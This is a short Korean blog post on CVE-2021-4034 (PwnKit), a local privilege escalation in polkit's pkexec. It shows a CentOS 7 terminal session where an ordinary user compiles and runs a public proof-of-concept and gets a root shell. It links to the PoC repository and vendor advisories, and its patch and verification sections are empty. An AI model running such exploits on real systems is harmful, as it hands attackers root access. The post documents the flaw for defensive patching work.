728x90
반응형
CVE-2021-4034는 PwnKit이라 명명되었으며, 이는 약 12년 전 pkexec의 초기 커밋인 것으로 밝혀져 모든 Polkit 버전이 영향을 받습니다.
Pkexec는 권한이 있는 프로세스와 권한이 없는 프로세스 간의 상호 작용을 협상하는 Polkit 오픈 소스 응용 프로그램 프레임워크의 일부로, 이를 사용할 경우 권한이 있는 사용자가 다른 사용자로 명령을 실행할 수 있도록 합니다.
1. 테스트 환경
CentOS Linux release 7.8.2003 (Core)
2. 테스트
[user@centos ~]$ id
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
[user@centos ~]$ ./cve-2021-4034-poc
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
3. 패치
4. 검증
5. 참고사이트
- git : https://github.com/arthepsy/CVE-2021-4034
- KISA : https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36424
- Redhat : https://access.redhat.com/security/cve/CVE-2021-4034
https://access.redhat.com/errata/RHSA-2022:0267
- AWS : https://alas.aws.amazon.com/AL2/ALAS-2022-1745.html
- 보안업체(Alyac) : https://blog.alyac.co.kr/4448
반응형
'엔지니어 > Linux' 카테고리의 다른 글
| sed 및 awk 사용법 (0) | 2022.10.28 |
|---|---|
| Firewalld (0) | 2022.02.22 |
| Centos6 + Apache 2.2 + Mod Security 2.8 setting (1) | 2018.04.18 |
| drbd split brain 스플릿 브레인 처리 (0) | 2018.03.28 |
| 리눅스 multi default gateway(routing) 설정 (0) | 2017.12.21 |
